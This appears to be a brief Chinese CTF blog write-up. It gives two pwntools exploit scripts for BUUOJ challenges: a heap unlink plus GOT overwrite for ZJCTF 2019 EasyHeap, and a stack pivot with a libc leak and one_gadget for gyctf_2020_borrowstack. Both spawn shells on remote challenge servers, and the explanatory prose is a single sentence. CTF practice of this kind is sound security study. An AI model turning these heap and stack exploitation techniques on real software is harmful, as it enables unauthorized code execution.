[ZJCTF 2019]EasyHeap

这里有几个点,首先要用ret把栈的地址叠高,这样防止exp覆盖函数原来的数据

第二个就是

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
from pwn import *

#p=process('./pwn')
context(log_level='debug')
p=remote('node5.buuoj.cn',27294)
elf=ELF('./pwn')
libc=ELF('./libc-2.23.so')
free_got = elf.got['free']
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']+0x16
system_plt = elf.plt['system']

def add(size,content):
    p.sendlineafter(b'Your choice :',str(1))
    p.sendlineafter(b'Size of Heap : ',str(size))
    p.sendlineafter(b'Content of heap:',content)
    p.recvuntil(b'SuccessFul')

def edit(idx,content):
    p.sendlineafter(b'Your choice :',str(2))
    p.sendlineafter(b'Index :',str(idx))
    p.sendlineafter(b'Size of Heap : ',str(len(content)))
    p.sendlineafter(b'Content of heap :',content)
    p.recvuntil(b'Done !')

def delete(idx):
    p.sendlineafter(b'Your choice :',str(3))
    p.sendlineafter(b'Index :',str(idx))
    #p.recvuntil(b'Done !')

bss=0x6020E0

#gdb.attach(p)
add(0x80,b'aaaa')
add(0x80,b'bbbb')

add(0x90,b'cccc')
add(0x90,b'/bin/sh\x00')
payload=p64(0)+p64(0x81)+p64(bss-0x18)+p64(bss-0x10)+b'M'*(0x80-0x20)
payload+=p64(0x80)+p64(0x90)

edit(0,payload)
pause()
delete(1)

payload2=p64(0)*3
payload2+=p64(free_got)+p64(puts_got)

edit(0,payload2)
payload1=p64(system_plt)
edit(0,payload1)
delete(3)
'''
leak=u64(p.recvuntil('\x7f')[-6:]+b'\x00\x00')

print(hex(leak))
libc_addr=leak-libc.sym['puts']

system=libc_addr+libc.sym['system']

payload=p64(system)

edit(0,payload)

delete(3)
'''

p.interactive()

gyctf_2020_borrowstack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
from LibcSearcher import *
#p=process('./pwn')
p=remote('node5.buuoj.cn',25450)
elf=ELF('./pwn')
context(log_level='debug')
leave_ret=0x400699
pop_rdi=0x0000000000400703
bss=0x601080
ret=0x4004c9
libc=ELF('./libc-2.23.so')


shell=0x4526a


main = elf.sym["main"]
puts_plt= elf.plt["puts"]
puts_got = elf.got["puts"]
#gdb.attach(p)
pause()

payload=b'a'*0x60+p64(bss)+p64(leave_ret)

p.send(payload)

payload2=p64(ret)*28+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.send(payload2)
p.recvuntil(b'Done!You can check and use your borrow stack now!\n')
leak_addr = u64(p.recv(6)+b'\x00\x00')
print(hex(leak_addr))

libc_base=leak_addr-libc.sym['puts']

shell+=libc_base

payload2=b'a'*0x68+p64(shell)

p.sendline(payload2)

p.interactive()